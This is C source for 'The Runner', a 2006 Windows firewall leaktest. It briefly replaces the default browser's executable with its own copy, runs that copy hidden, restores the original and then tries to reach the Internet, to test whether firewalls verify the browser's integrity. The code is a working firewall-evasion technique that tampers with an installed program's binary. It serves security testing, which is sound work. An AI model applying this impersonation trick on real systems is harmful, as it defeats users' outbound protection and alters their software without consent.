/*

 The Runner is a leaktest program. Please visit http://www.matousec.com/ for more information.
 
 The Runner finds the default browser's executable and renames it. Then it copies itself 
 to the file of the original default browser's executable. It runs this copy, renames it, 
 copies the original executable of the default browser back and then it tries to establish 
 an Internet connection. 

 Firewalls that are not able to handle this trick either do not verify the integrity of 
 the default browser, or their verification occurs when the privileged action is executed 
 instead of the moment of the fake executable execution.

*/

#undef __STRICT_ANSI__     
#include <windows.h>
#include <stdarg.h>
#include <stdio.h>
#include "common/ntinternals.h"
#include "common/ltcommon.h"
#include "main.h"

// verbosity: TRUE = be verbose on output
int verbose=FALSE;

// maximum size of the leaktest page
#define DATA_MAX        4096
// names of synchronization events
#define SYNC_EVENT_1    "lt_runner_1"
#define SYNC_EVENT_2    "lt_runner_2"

void about(void)
{
  printf("The Runner - leaktest program\n");
  printf("Windows Personal Firewall Analysis project\n");
  printf("Copyright 2006 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/""\n\n");
  return;
}

void usage(void)
{
  printf("Usage: lt-runner [options]\n"
         "Options:\n"
         "  -v          be verbose on output (optional)\n");
  return;
}


/*
 get browsers image info collects information about the browsers image 
 which path is given in the first argument and stores the information 
 to the structure specified by the second argument
 return value is TRUE if the function succeed, FALSE otherwise
*/

int get_browser_image_info(char *path,PBR_INFO info)
{
  int res=FALSE;
  HANDLE file=CreateFile(path,GENERIC_READ,FILE_SHARE_READ | FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);
  if (file!=INVALID_HANDLE_VALUE)
  {
    char buffer[4096];
    
    DWORD bread;
    if (ReadFile(file,buffer,sizeof(buffer),&bread,NULL))
    {
      char *limit=buffer+bread;
      PIMAGE_DOS_HEADER dos_hdr=(PIMAGE_DOS_HEADER)buffer;
      int invalid_image=TRUE;

      if ((size_t)limit>(size_t)&dos_hdr->e_lfanew+sizeof(dos_hdr->e_lfanew))
      {
        PIMAGE_NT_HEADERS nt_hdr=(PIMAGE_NT_HEADERS)(buffer+dos_hdr->e_lfanew);
        if ((size_t)limit>(size_t)nt_hdr+sizeof(IMAGE_NT_HEADERS))
        {
          info->image_base=(PVOID)nt_hdr->OptionalHeader.ImageBase;
          info->image_size=nt_hdr->OptionalHeader.SizeOfImage;
          info->entry_point=(PVOID)((size_t)info->image_base+nt_hdr->OptionalHeader.AddressOfEntryPoint);
          info->sub_system=nt_hdr->OptionalHeader.Subsystem;
          invalid_image=FALSE;
          res=TRUE;
        }
      } 

      if (invalid_image) fprintf(stderr,"Default browser's image is invalid.\n");
    } else 
    {
      fprintf(stderr,"Unable to read from file \"%s\".\n",path);
      print_last_error();
    }

    CloseHandle(file);
  } else 
  {
    fprintf(stderr,"Unable to open file \"%s\" for reading.\n",path);
    print_last_error();
  }
  return res;
}


int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
  int res=FALSE;
  char module[MAX_PATH],tmppath[MAX_PATH],browsbak[MAX_PATH],runner[MAX_PATH],defbrows[MAX_PATH],*exename;

  if (!get_default_browser_name(defbrows,MAX_PATH))
  {
    fprintf(stderr,"Unable to obtain the default browser's path.\n");
    printf("\nTEST FAILED!\n");
    return 1;
  }

 
  GetModuleFileName(NULL,module,MAX_PATH);
  exename=strrchr(module,'\\');
  if (exename) exename++;
  else exename=module;

  strncpy(tmppath,defbrows,MAX_PATH);
  tmppath[MAX_PATH-1]='\0';
  char *slash=strrchr(tmppath,'\\');
  if (*slash) *slash='\0';
  else tmppath[0]='\0';

  snprintf(browsbak,sizeof(browsbak),"%s\\browser.bak",tmppath);
  browsbak[sizeof(browsbak)-1]='\0';

  snprintf(runner,sizeof(runner),"%s\\runner",tmppath);
  runner[sizeof(runner)-1]='\0';

  if (!stricmp(exename,"lt-runner.exe"))
  {
    about();

    int clen=strlen(lpCmdLine);
    verbose=!strcmp(lpCmdLine,"-v");

    if (clen && !verbose)
    {
      usage();
      return 1;
    }
   
    if (verbose) printf("Default browser's image path = \"%s\".\n",defbrows);

    if (MoveFileEx(defbrows,browsbak,MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH))
    {
      if (verbose) printf("File \"%s\" moved to \"%s\".\n",defbrows,browsbak);

      if (CopyFile(module,defbrows,FALSE))
      {
        if (verbose) printf("File \"%s\" copied to \"%s\".\n",module,browsbak);

        SHELLEXECUTEINFO sei;
        memset(&sei,0,sizeof(sei));
        sei.cbSize=sizeof(sei);
        sei.fMask=SEE_MASK_FLAG_NO_UI;
        sei.lpVerb="open";
        sei.lpFile=defbrows;
        sei.nShow=SW_HIDE;

        printf("Initialization of The Runner leaktest succeeded.\n"
               "Running child processes ...\n");

        if (ShellExecuteEx(&sei))
        {
          if (verbose) printf("Helper process is running, the result of this test will be displayed in a message box.\n");
          res=TRUE;
        } else 
        {
          fprintf(stderr,"Unable to run \"%s\" using ShellExecuteEx.\n",defbrows);
          print_last_error();
        }
      } else
      {
        fprintf(stderr,"Unable to copy file \"%s\" to \"%s\".\n",module,defbrows);
        print_last_error();
      }
    } else
    { 
      fprintf(stderr,"Unable to move file \"%s\" to \"%s\".\n",defbrows,browsbak);
      print_last_error();
    }

    if (res) return 0;

    printf("\nTEST FAILED!\n");
    return 1;
  }

  Sleep(5000);

  if (MoveFileEx(module,runner,MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH)
   && MoveFileEx(browsbak,module,MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH))
  {
    char buffer[DATA_MAX];
    res=leaktest_attempt(buffer,sizeof(buffer));

    char message[1024+DATA_MAX];

    if (res)
    {
      snprintf(message,1024+DATA_MAX,
               "Following data were downloaded from the Internet page\n \"%s\":\n\n%s",LEAKTEST_PAGE,buffer);
      message[1024+DATA_MAX-1]='\0';
    } else
    {
      snprintf(message,1024+DATA_MAX,
               "This leaktest failed to download data from the Internet.");
      message[1024+DATA_MAX-1]='\0';
    }

    MessageBox(NULL,message,"The Runner",MB_OK);

  } else MessageBox(NULL,"Unable to move important files, leaktest failed.\n","The Runner",MB_OK);

  return (res ? 0 : 1);
}
